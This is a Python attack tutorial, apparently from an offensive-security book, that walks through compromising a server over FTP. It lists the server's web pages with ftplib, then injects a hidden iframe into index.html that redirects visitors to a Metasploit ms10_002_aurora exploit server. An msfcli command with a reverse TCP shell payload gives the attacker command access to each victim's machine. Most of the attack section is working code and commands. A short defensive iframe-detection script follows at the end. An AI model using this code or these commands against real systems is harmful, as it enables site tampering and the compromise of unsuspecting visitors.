Contents
1. Searching for web pages on the FTP server
1.1 Functions:
1.2 Implementation:
2. Adding malicious injection code to web pages
2.1 Analysis:
2.2 Functions:
2.3 Implementation:
1.1 Functions:
ftp.nlst(): returns the list of files in the specified directory on the FTP server
fileName.lower(): converts all uppercase letters in a string to lowercase
1.2 Implementation:
Once we have the login password for the FTP server, we test whether the server also provides a web service.
First, list all the files in the FTP directory and search for default web pages. The returnDefault() function takes an FTP connection as its parameter and returns an array of the default web pages it finds. It does this by issuing the NLST command (the command that lists all files in a directory). The function checks, one by one, whether the name of each file listed by NLST is a default web page filename, and adds every default page it finds to an array named retList. After completing this iteration, the function returns the array.
Run python defaultPages.py
```python
import ftplib


def returnDefault(ftp):
    """Return the default web pages found in the FTP directory."""
    try:
        # NLST lists the files in the current directory
        dirList = ftp.nlst()
    except ftplib.all_errors:
        print('[-] Could not list directory contents.')
        print('[-] Skipping To Next Target.')
        return []
    retList = []
    for fileName in dirList:
        fn = fileName.lower()
        # Treat .php, .htm(l) and .asp(x) files as web pages
        if '.php' in fn or '.htm' in fn or '.asp' in fn:
            print('[+] Found default page: ' + fileName)
            retList.append(fileName)
    return retList


host = '192.168.190.131'
userName = 'guest'
password = 'guest'
ftp = ftplib.FTP(host)
ftp.login(userName, password)
returnDefault(ftp)
```
2.1 Analysis:
Now that the web page files have been found, they must be infected with malicious redirection code. To quickly create a malicious server and page at http://xx.xx.xx.xx:8080/exploit, the Metasploit framework is used; the exploit chosen is ms10_002_aurora. The page at ip:8080/exploit exploits a vulnerability in the browser that is redirected to it, making it give us a reverse connection through which we can control this "zombie".
```
msfcli exploit/windows/browser/ms10_002_aurora LHOST=xx.xx.xx.xx SRVHOST=xx.xx.xx.xx URIPATH=/exploit PAYLOAD=windows/shell/reverse_tcp LHOST=xx.xx.xx.xx LPORT=443 E
```
If any vulnerable browser connects to the server at http://xx.xx.xx.xx:8080/exploit, it executes the exploit code. Once that succeeds, a reverse TCP shell is generated, giving us a Windows command prompt on the compromised computer. With this command shell, commands can be executed on the "zombie" with administrator privileges.
Next, we add a piece of code that redirects to our malicious server to the normal web pages of the compromised server. We can download the default web page from the compromised server, insert an iframe into it, and then send the page with the malicious code inserted back to the compromised server.
The injectPage() function takes an FTP connection, a page name, and the iframe string used for the redirection, then downloads a temporary copy of the web page. Next, it appends the iframe that redirects to our malicious server to this temporary file. Finally, the function sends the infected page back to the compromised server.
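2.2 Functions:
ftp.retrlines(): uses the RETR command to retrieve the contents of a file line by line
storlines(cmd, f): given an FTP command (such as "STOR filename"), uploads a text file
ftplib.FTP class: implements the client side of the FTP protocol; you can use it to write Python programs that perform various FTP jobs
2.3 Implementation: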
python injectPage.py
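```python
import ftplib


def injectPage(ftp, page, redirect):
    # Download a temporary copy of the page; retrlines() strips the line
    # endings, so they are restored when writing the copy
    with open(page + '.tmp', 'w') as f:
        ftp.retrlines('RETR ' + page, lambda line: f.write(line + '\n'))
        print('[+] Downloaded Page: ' + page)
        # Append the redirect iframe to the end of the temporary copy
        f.write(redirect)
    print('[+] Injected Malicious IFrame on: ' + page)
    # storlines() reads from a file object opened in binary mode
    with open(page + '.tmp', 'rb') as f:
        ftp.storlines('STOR ' + page, f)
    print('[+] Uploaded Injected Page: ' + page)


host = '192.168.190.131'
userName = 'guest'
passWord = 'guest'
ftp = ftplib.FTP(host)
ftp.login(userName, passWord)
redirect = '<iframe src= '+'"http://xx.xx.xx.xx:8080/exploit"></iframe>'
injectPage(ftp, 'index.html', redirect)
```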
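From the defender's side, the injection described above leaves a recognisable trace: injectPage() appends the iframe to the end of the downloaded file, so the tag lands after the closing </html> and points at a host the site does not own. The check below is an added example, not code from the original page; the function name find_suspicious_iframes, the allowlist and the sample pages are constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Captures the src value of each <iframe>, quoted or unquoted
IFRAME_RE = re.compile(r'<iframe\b[^>]*?\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
HTML_END_RE = re.compile(r'</html\s*>', re.I)


def find_suspicious_iframes(html, allowed_hosts):
    """Return [(src, reasons)] for iframes that deserve review.

    'external-host'  : src names a host that is not in allowed_hosts
    'after-html-end' : the tag sits after the last </html> in the file
    """
    allowed = {h.lower() for h in allowed_hosts}
    ends = [m.end() for m in HTML_END_RE.finditer(html)]
    doc_end = ends[-1] if ends else None
    findings = []
    for m in IFRAME_RE.finditer(html):
        src = m.group(1)
        # Relative URLs have no hostname and count as same-site
        host = (urlparse(src).hostname or '').lower()
        reasons = []
        if host and host not in allowed:
            reasons.append('external-host')
        if doc_end is not None and m.start() >= doc_end:
            reasons.append('after-html-end')
        if reasons:
            findings.append((src, reasons))
    return findings


# Constructed sample pages (not taken from any real site)
CLEAN_PAGE = (
    '<html><body><h1>Welcome</h1>'
    '<iframe src="/embed/map.html"></iframe>'
    '<iframe src="https://maps.example.com/view"></iframe>'
    '</body></html>\n'
)
# The same page with an iframe appended to the end of the file, which is
# the modification the injectPage() routine above makes
TAMPERED_PAGE = CLEAN_PAGE + '<iframe src= "http://203.0.113.10:8080/exploit"></iframe>'

if __name__ == '__main__':
    for src, reasons in find_suspicious_iframes(TAMPERED_PAGE, {'maps.example.com'}):
        print(src, reasons)
```

Run it over the files in the web root with the site's own embed hosts as the allowlist. Comparing published pages against known-good hashes also catches modifications that do not use an iframe.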